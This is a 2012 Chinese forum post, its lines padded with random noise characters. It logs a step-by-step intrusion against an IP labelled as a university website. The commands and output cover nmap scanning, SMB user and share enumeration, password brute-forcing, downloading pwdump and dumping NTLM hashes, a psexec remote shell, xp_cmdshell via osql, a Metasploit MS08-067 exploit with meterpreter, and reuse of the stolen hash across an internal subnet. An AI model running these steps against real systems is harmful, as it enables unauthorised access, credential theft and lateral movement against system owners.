广西师范网站http://202.103.242.241/
7 V, r7 A; W1 |8 D# U7 b7 s: w0 B" |3 |: J: n
root@bt:~# nmap -sS -sV 202.103.242.241
( Z; ^, `0 ]" x1 j! Q7 D: R. z% @8 x3 z) t; P, H5 I7 [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
8 H8 R' P+ x6 H E E" a7 n9 ^, S7 r2 p5 p/ h4 _% H5 D: O
Nmap scan report for bogon (202.103.242.241)1 F* o6 b# S5 p" H, _7 w
6 t( c+ {: L; e' fHost is up (0.00048s latency).% o3 n8 M) ]% H0 I
+ X* f( p$ Y+ _9 _6 b, I
Not shown: 993 closed ports O7 s' t1 x. q, H( f- o: Z
' W: X$ a! P7 O$ a& mPORT STATE SERVICE VERSION: }8 T Q0 F% P( B( F9 ]
4 |: G* c; j2 ]2 Q4 C135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe); c+ }' r/ J9 r2 p
. D! s' B! V1 ^+ U: ?139/tcp open netbios-ssn% i7 j* s# ?# N. A0 k$ C5 o$ {: q
; N2 d! K5 I$ B" J* n445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds X( |' M. w% m$ u: ^+ H6 B' B
$ H4 h6 c _: s
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe); [7 h. X$ o1 \9 t- J6 X
1 U' F; v. z7 ]- K2 \
1026/tcp open msrpc Microsoft Windows RPC& q0 I- Y2 [; h
* c& a0 y, g8 e3372/tcp open msdtc?/ G6 Z$ ^2 G$ u) ]+ D) Y$ v
5 w( l& L% ?/ q, H: p% s$ z4 E9 [: P3389/tcp open ms-term-serv?6 G! A5 }* S4 n
K9 `/ O# N6 c6 S1 h# W$ Q
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :) [( v- j0 q8 V
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r! j. w. a' {0 y! _4 x- U+ d0 X
% V6 L+ |/ z1 M NSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
% P( X4 E( I( ]# Y' L1 W9 c
1 y/ O6 n/ x/ NSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)% |. Q; |* y, f) q
' B: `2 Z |' s* N9 I
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO/ j+ ^4 u5 n: w2 z* V
8 I2 z- a( N! A" H( j& C+ }4 o3 V
SF:ptions,6,”hO\n\x000Z”);/ Z( r. X/ Q# T2 n6 W
. x: S6 e! w9 b8 t8 ?& [4 ~ u7 GMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
& S. w0 D7 u# G" h5 f: U2 X4 G: S3 D$ i7 ^
Service Info: OS: Windows3 M; M/ k, H3 B( d6 v
7 G1 }% I+ k* Q+ kService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
* H' Q Y7 S" f) B4 S+ w/ e- e3 l6 b2 d* w. N
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds3 T( G3 S6 |* s( A
$ ?2 a9 E l. a( t* @5 m
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
# o$ M) l$ i) M8 j. s
2 F; Y% m4 i* K9 g( S; v# ?-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
9 U3 ]% _: o! A- l' T& D
( V2 P; m6 R' b O! f# c! Y-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse6 I; Q( H: }: ~- w# j: W* f
. n- T. o( n: `3 ` t
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
! Q! \7 P* d: }0 \. E' Y5 i' G1 ?- E! G6 ]* b6 m2 h
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse, t- \, I% e4 G% Q
; o/ S3 M: E8 p; r2 f-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
& G/ s" t! v! k" i/ V
1 Q7 ~% l' h4 Z-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
- U9 n6 @ ?% W# T; t
: c* D, E5 i' A0 ]' F$ h-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse8 k: d0 R, F0 n- v! M1 e2 x8 w9 i
s/ d1 r8 N; J3 d( i/ U% G; Y-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
* {' s- u6 Q- C5 M9 c$ G( ^5 c+ w+ s8 [/ t# O1 v+ {: q' {5 P
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse! j) Z0 U. | }; ^. y% K$ }
9 j% M" @3 z1 a) ^3 g4 x, T-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
9 U9 D; o6 j) p1 n, C6 F F$ E4 W- R6 Z' a; B
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse( X/ G! |! T7 x+ ?, f8 X
4 p- M# \* e+ u+ U; t: ]/ ]1 d: K6 g-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse3 Y' _# @$ u- h- D! D2 H+ z
$ u! d% [8 h( \" ^: t' O-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse4 |8 y [( I- _: [1 \0 p
3 V Q. y$ n" }-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
& h, {, v }# ?! V% T2 G/ ^" b4 N& {8 u- o" s
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
9 v; H/ [4 f2 X6 C- j+ \
) _7 X9 P8 |( Y$ f+ }6 Nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
+ k' a6 k% R" g% z
$ }7 P% t5 N0 K0 v& R1 Y7 s/ r//此乃使用脚本扫描远程机器所存在的账户名
7 m4 @% N& o) v# ], r7 N7 K
+ N- B" b3 k7 f. Z) j0 ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
5 y+ J/ A7 F& i* N1 k
; d) D7 ?: a f: uNmap scan report for bogon (202.103.242.241)
6 C* Q5 I/ q, E U% k X) l. W* c& ? L+ t8 y9 ?" a
Host is up (0.00038s latency)." s$ l8 a5 G. [
, M$ r' D9 f, J# t `: x( w; w: tNot shown: 993 closed ports: o% i9 f* }8 J$ }; l+ N& ~
1 b, p+ ~! A0 \$ Q nPORT STATE SERVICE% Q9 A8 k" O1 W. q! K- t- J
, }, t* M+ D- a8 p0 Z
135/tcp open msrpc
1 O$ F' q. r( ?( y. @5 E5 z, @! d& J( ~- W0 H5 f, Z0 W
139/tcp open netbios-ssn
: [2 u5 a* F* R$ i/ c! }4 x' T: a- p+ C& Z/ M& ?6 {! @+ K- z1 I
445/tcp open microsoft-ds
* [: n/ T3 H- u+ d6 s6 w; L" M6 P& |! b; X4 V3 {
1025/tcp open NFS-or-IIS
. @$ j9 g+ I0 u! U3 i3 u n Z p" S0 `: B+ E% ?4 B
1026/tcp open LSA-or-nterm
) O, p/ Q" F9 N3 Z
* g& W5 g# u# y W; F+ M! D3372/tcp open msdtc( |: X( Z$ S3 e0 h. `6 `
3 n% K* R& j% ~% A
3389/tcp open ms-term-serv# [3 g5 ^8 `( V- E
8 u# P" R. Q* u1 y
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 q; Y/ @8 s Q
0 P5 t! j& [0 n' Y; \1 B" eHost script results:
' T5 l% M4 S" | }$ L8 w. [7 p" K/ W4 d' H1 f
| smb-enum-users:
; `: m: E# Z" w3 m2 {4 Q4 d7 I: c- q4 t6 W$ Q. H
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
: |7 N+ w" c! e2 J; }
4 a9 Z7 A* y' K- E. v6 lNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
1 Z* K" S) ]7 J2 j
' G/ m* W! C' aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ) b* ~8 U3 o; X' H# w% p
( }- K, a0 o1 `//查看共享# `0 T. N4 Z$ c x6 C! P7 }. u5 M6 T
8 w: l- O5 U( o8 S' K9 p WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
* K, o% e- T4 z6 A2 Y( m! @7 t7 i1 w& e2 v$ S: a
Nmap scan report for bogon (202.103.242.241)
8 b% b- ^ c: R& r8 ]1 b, l) H) k% |' p& \) r2 H
Host is up (0.00035s latency).7 g1 C$ T7 |' E; h
G! U/ F, s7 E' vNot shown: 993 closed ports9 K! E7 L- e* g( n
$ W" x9 v2 ]! r2 R4 U$ p
PORT STATE SERVICE! G& {/ e5 j1 `/ g% v5 H) R
7 l4 y9 t4 j2 X# H3 ^7 K- I
135/tcp open msrpc6 z) t8 t) q& a& y2 G9 Q
# G, t, X' b+ j1 V
139/tcp open netbios-ssn
9 Q# y$ [# r0 |+ S6 `/ u. d1 d7 R
445/tcp open microsoft-ds& `- e. {2 |4 V- O4 |/ u
" E9 m" T( z. a% ]" V9 M4 O1025/tcp open NFS-or-IIS
9 h0 f- s- o0 I/ ]9 g
0 _+ J/ K* U: G" h# g1026/tcp open LSA-or-nterm; E& j# K+ E: l( d
( y6 A- m8 a1 d z6 ]5 E$ y' O
3372/tcp open msdtc
; ?5 I5 B% _; ~* p3 R5 R3 B P# U) g f* \& h
3389/tcp open ms-term-serv
& Q2 p; l7 `: a
0 X/ `! }& m1 ]3 rMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). N$ [! h# ?7 u i1 \
& [1 g5 t% G0 `5 z7 ]
Host script results:, O0 \3 [8 j" H ]( o- j- C
( O% }. Q6 p, `, h) O* E+ `+ Q
| smb-enum-shares:4 C0 y. Z0 D3 Q3 S
9 P4 K! G$ y @; h
| ADMIN$
% r+ x0 T! J) k1 Q# l/ {" L( l; O: O1 _0 ?8 E* `% b7 s# W
| Anonymous access: <none>. t4 y8 E( r# S1 g4 i+ ^
& Z+ C6 W h. w0 } x. n* e
| C$8 f( Z4 h" E8 `% H+ Q6 h+ q
" {; t! S9 N5 G. u$ @
| Anonymous access: <none>6 V0 e8 O/ Y8 |: d
- Z6 R! h& ` A0 }| IPC$& T, }% J: ^, }( g. r
% i3 h" k* K% t|_ Anonymous access: READ9 U! y4 p% k& @( N6 \5 U5 O
8 E% x( W8 g9 P3 k- lNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
0 t+ z% j+ ^8 \* v$ d( w
$ O( ~) k) t% Z/ @+ Qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 5 @; e& |- H+ m1 D9 s. |4 ]
/ K5 B2 A/ _8 g, B% q2 G
//获取用户密码
3 t5 _4 g' j' q9 K% c
) o, R, O6 u0 j. A$ K0 kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
/ O0 D5 G/ S5 h) h9 j: K
- d, \5 V3 w0 O& rNmap scan report for bogon (202.103.242.2418)
! {1 P f9 }; Y9 V* V, G( E+ a0 q
Host is up (0.00041s latency).
: v; ?" ?# Z' s- S6 E% g8 v% q) R* g. b4 K: a/ I6 t* {) K: Y) O
Not shown: 993 closed ports" y1 ]2 ~4 C8 V( m
, O, U# }8 N0 IPORT STATE SERVICE
4 x) J; C }1 P+ A; e$ g* \% u; b# q' l v* v7 d
135/tcp open msrpc
! N7 K) L- Z& p4 n. ^4 F% K* W6 @7 D$ D& O3 D* P0 {3 [
139/tcp open netbios-ssn% O" H( F7 S7 U( m- {) N
9 ^3 p: X) W# W% b& F
445/tcp open microsoft-ds7 \/ G% n/ ^' r# I7 `4 O& `
1 Q: x2 H2 Y w
1025/tcp open NFS-or-IIS
2 _: f# _+ U, `. o
- d, ?& O% f% z% c4 z1026/tcp open LSA-or-nterm$ F( r4 Z) ?6 x; L; L! E
4 A2 h- ]7 x2 c3372/tcp open msdtc
: U! d: ?1 g0 A; x, ^5 g7 S
4 c. p( r7 @# c; G2 x" b3389/tcp open ms-term-serv+ X. [' S. \! w$ U: j9 ]' [: T W
4 J- ^( ~- N; D- F! n6 iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), G$ H9 c# ?6 p2 S# b- P
P. j- j$ [0 r; V- h& r, v
Host script results:+ H5 c6 A" \ \6 t2 d
$ z% q- @) ^6 L| smb-brute:+ k/ M! d& e$ {; b @
: }; j) U+ D: z: r9 {" _- q( m Z
administrator:<blank> => Login was successful
3 g* L, o& r) f% T! S6 w) u' V( U) {$ v( u' c$ @+ v, a$ Z
|_ test:123456 => Login was successful, i$ e6 W7 X" Z L- R, I! M' Z" ^, D0 T
9 s9 k# ^, r2 t% u; D8 S' hNmap done: 1 IP address (1 host up) scanned in 28.22 seconds! b3 x$ h4 H& b* z
/ u- e: F3 A8 c1 A$ [' W* z1 _root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
% z% K4 @2 r; ?. g8 [1 J& O- m
0 R) J9 e8 \1 A$ ^+ O0 _! T0 hroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data' m8 I; d+ u0 A$ C
( S$ G0 r8 O! ]: N7 I
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
4 z- g" }" w$ e3 f. e' e2 [6 s6 ]+ C% q |$ h+ _
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Y8 e4 r# l, [/ n9 z1 ~6 Y1 P$ ? O$ v V5 ]7 n% o
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST3 Z: \, G; V& `$ p/ Q( I
* S; M9 `8 E" P0 L/ f7 W1 S& uNmap scan report for bogon (202.103.242.241)- o) W5 v+ q6 P
- `! h7 S. ]+ ]1 Y& [8 l, |Host is up (0.0012s latency).7 X+ L2 Z9 `# {5 Y' [& D
/ F3 Z( N( P- o# _0 w' OPORT STATE SERVICE
1 ]4 X! ?. D- d7 ]6 A
' Q) w0 [2 I& c135/tcp open msrpc
4 A/ ~9 H8 Q' S/ G# T2 }/ {& F3 }: S# n+ P" E
139/tcp open netbios-ssn
& K3 P) a5 V! n* l6 t1 _% l& h% R$ l2 a* H7 ~5 {
445/tcp open microsoft-ds- N+ a! I3 U1 I3 {- c
5 }# p4 G9 h" V2 ?/ H( |/ p
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ g( K/ z/ C5 q
/ |( |$ t/ o! c/ S* k6 oHost script results:+ m: P% i, G! c* g. v' @, {. d
0 U' r# `2 g" S6 E2 q/ f7 N| smb-pwdump:
: P D* H# s. D) ~7 D
# U( a- |; F# \1 x( a5 Q, B, L| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
1 Q+ n; r8 {: g' a! m, R
4 a$ C) b5 N( H$ H# E| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
. H/ S) }! i. T# T6 r1 m2 X9 v( u* x3 a/ x6 m- X
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D43 W5 I8 s6 L; b1 y, m% c# Q6 f3 p
1 j% X# {6 ]1 ^, a1 I|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
/ E8 V) q( [6 D7 h" p5 r" j+ ^: r9 S$ H
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
- D' P( |9 b1 K8 |1 E
5 |- _2 Z) B( @/ q; G& }' gC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
2 v! d9 {7 u- N8 H2 A, c7 @% M, A, f- n" v" y9 M3 h0 u( H) p
-p 123456 -e cmd.exe+ F' ]5 }$ [; h- b/ `2 s$ [0 T
# |3 |& j/ [/ K( F' |. x# a, n# ^
PsExec v1.55 – Execute processes remotely
P" e& W5 H: n: h8 O
8 X- V9 A9 T& [, JCopyright (C) 2001-2004 Mark Russinovich5 D0 @5 I6 [" K1 X: \
3 C7 S# G! H! K8 i n" w! TSysinternals – www.sysinternals.com) ?3 V5 E& Q# u8 S
; w5 H7 m! P- U4 Q9 |, B+ ?2 |% @
Microsoft Windows 2000 [Version 5.00.2195]; Q' v9 c" {$ ~9 V- V! j
) L& F& j1 l1 c5 C7 ~
(C) 版权所有 1985-2000 Microsoft Corp. p6 @( u" X; A8 E% q
3 h! _3 X, U+ a- B0 J8 R8 |4 r$ zC:\WINNT\system32>ipconfig
/ A7 B& [8 y& {8 Q4 X; s1 N+ e7 a, c8 `. j/ Z- I6 @
Windows 2000 IP Configuration
7 y* A2 {- S6 x. ^$ L& p2 D& E% c2 [1 A3 n. S4 T) S4 S
Ethernet adapter 本地连接:5 ?' o' M D3 h. B: ^3 T7 [7 F4 x
% A( G7 W9 p0 a! [" \$ D2 ?Connection-specific DNS Suffix . :; D2 Q* k d! ^9 }
- [4 F" P: d4 H0 c- W# H
IP Address. . . . . . . . . . . . : 202.103.242.241/ C% E% a7 q) R" }/ l
" n5 v; _/ V5 m: ]: P5 Y* ~
Subnet Mask . . . . . . . . . . . : 255.255.255.0
' U1 d8 j8 _( Q) F2 n( Z
; N" \4 _* j S5 C% {Default Gateway . . . . . . . . . : 202.103.1.1; ?0 u- J4 o% B2 J3 T$ x& i
; ]* i4 D* x; M6 Q/ F
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
9 W$ ^* [# l& Z2 b* N: A* N7 ~1 N- q6 Z6 Y! C4 M
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
) \ f, L W6 k& Q! F9 `: g$ g9 ~9 w5 d+ [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
8 B! ~* z! O+ X- C+ I( N1 d( L5 ?+ B! W* s5 b) k
Nmap scan report for bogon (202.103.242.241)
) F8 p+ \* F! s
$ N& q( q- ~; p( M. _4 U" MHost is up (0.00046s latency).
: B, N0 k0 }8 B; v" ]
% B) }' y2 T5 p+ K3 sNot shown: 993 closed ports
. T% m' e! `0 f
. F2 G3 c ^8 Z$ a B- yPORT STATE SERVICE
G' d6 N7 J5 d/ Y
/ G5 K. O. D c* s6 j135/tcp open msrpc' y8 y* q9 R" f" m0 d, Z+ [
; `) `) A$ b! H/ @+ B3 u, L. v
139/tcp open netbios-ssn
9 X) @; G" M' v6 f% { b/ g" h. P( @; s6 ]. l. Q0 s) A5 G
445/tcp open microsoft-ds$ D7 Y( w; a) X* B
0 x. w9 Q* t; U, Z4 j8 \! ]
1025/tcp open NFS-or-IIS5 ?: r' h+ ?4 R9 j( P7 M
* t- ^6 |- a# ~2 ^8 |) F5 W
1026/tcp open LSA-or-nterm
) M. ^$ {& N4 W L5 o E# F$ c
/ w7 u8 @) y& o8 x3 H3372/tcp open msdtc1 U5 q3 S# l7 _2 A8 n n5 b q( i
- a N2 N; f- P; g# h3 p' W3389/tcp open ms-term-serv3 @9 d: f% d* Y: u1 y
! a1 }/ A9 S/ g! j H4 R* \5 j& }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)( c" A! e8 N' i3 A4 k
! d. u. L$ W1 G4 u9 g
Host script results:
5 O8 ?) O( @! B0 G8 u
# J' f2 k$ l% z P| smb-check-vulns:7 s7 t. s( i- k, S2 K& |5 g! ~
0 _5 D( k" @: W3 K0 G1 i8 f- v
|_ MS08-067: VULNERABLE
* c4 s. t! x, z/ T6 y; P+ s
% t$ m9 _1 v; w3 y k1 aNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
0 h- b8 Q. ~/ j3 U. Z2 E3 T
, ?5 I/ P0 X ]) a8 wroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出* U. g! \ J8 \" X
- j- H' y4 @1 p: s' ^
msf > search ms08
9 K' |. J0 N1 w' ^' ~' r2 b" G$ [4 p) M+ O8 {8 S+ t
msf > use exploit/windows/smb/ms08_067_netapi0 t" k3 Q9 ^$ }0 ^6 X
' {$ \3 Y5 `1 o# ^2 o% xmsf exploit(ms08_067_netapi) > show options7 G4 j& Y, i) H
& a3 H9 ^) X& X' H! Vmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241) I2 i8 J% E( _/ ~( W/ `
# f' E( f, C D4 i) \: x6 M- vmsf exploit(ms08_067_netapi) > show payloads, J1 w8 S0 _9 F' h: X6 j# D
" Z @' |$ g5 G
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp) d5 d6 W8 v- s5 A% U
2 m$ o7 D* K' d* v
msf exploit(ms08_067_netapi) > exploit
/ h5 |# N8 T( h8 @* h
# a5 E: z2 ?# a8 e# y* a. f0 A0 j" Kmeterpreter ># Z7 T! h# F0 g l
' Q) I" C0 O6 J0 Y" xBackground session 2? [y/N] (ctrl+z): m6 G( K& g/ I8 ]! B! O
: J H$ |' A. O+ ~4 d# \msf exploit(ms08_067_netapi) > sessions -l( | |1 C9 U% [2 e* k
. D9 o' k& G7 k7 {& broot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
8 R; h, J; X, j! S' J& z# z$ l; P5 W1 i
test, ~9 B4 Q9 I% D7 Y2 y% v' B
$ A3 {4 w: }0 o2 ~! tadministrator
; E. m7 k- k7 j; e9 w+ r; @! X5 a3 d% P1 m
root@bt:/usr/local/share/nmap/scripts# vim password.txt* R, t9 y; q) L" C) U
) W3 B' F- u; z9 x* I$ y
44EFCE164AB921CAAAD3B435B51404EE
! X Y' \5 R! U& O
# Y1 T+ e- x5 t Q4 X. yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 # ~7 w0 o, l! @4 F
& U8 M L& J+ n7 |# s
//利用用户名跟获取的hash尝试对整段内网进行登录# t$ w7 x4 u/ s l8 S2 S: O. x
# L# s7 O( Y* r. t
Nmap scan report for 192.168.1.105 V5 a) ?7 S: h' ~; M% I) l
! p) z5 t( q& s
Host is up (0.00088s latency).
0 r- W6 S5 F1 M+ A4 [) k; f- c& [1 q
0 C; t' a8 z2 ]6 DNot shown: 993 closed ports, u9 h9 a6 }5 `
" I0 T1 w! T/ S N
PORT STATE SERVICE" F- P* Y* C9 T/ ]1 U
/ p* p3 w( _* d1 _2 a' o0 f135/tcp open msrpc
$ e, m2 {2 w' T* y# l3 J
6 e8 l1 Z" T5 w* c+ }5 x139/tcp open netbios-ssn) C) @4 I2 I$ I# J/ [" i. n% O4 K
, ~2 U1 c* ^3 Y$ P& i
445/tcp open microsoft-ds
$ p+ Y0 e: b2 T9 Q2 l/ y4 Z9 c/ [" M' t u- E; Y
1025/tcp open NFS-or-IIS
" v: E: F6 q" B5 l4 ^7 J4 Q* e+ I. H& v2 K$ n
1026/tcp open LSA-or-nterm
I3 n3 m8 D/ [6 d: @ x4 J
" `6 D& B; ~% g4 L, k0 p! \3372/tcp open msdtc! @1 b4 K2 ^# M; ]0 l6 N
& S. k0 T6 Y/ ?: g4 u+ c. t2 K
3389/tcp open ms-term-serv( }2 C- P1 ^/ J5 u; I( }
: o8 H* Z F% JMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( w+ S5 r2 i1 o" k# E1 T: k! p9 {2 ^$ o! z1 |! m
Host script results:) e! u" N" t4 z; F! _/ ?7 K4 ?1 f' e
7 b9 o* F H; j/ }/ R
| smb-brute:
6 E2 A2 O9 v5 o* G V2 H% C3 t" r, M8 c6 G% l
|_ administrator:<blank> => Login was successful
3 U1 M. G2 O/ r |: n9 D
' ]7 _6 }+ R# o2 q+ Y. O攻击成功,一个简单的msf+nmap攻击~~·6 [$ p& Q: r& X% e5 A1 {: j4 e1 j8 O
3 c6 N2 i6 v9 K1 ~2 ?
|
发表于 2012-12-4 12:46:42
收藏
支持
反对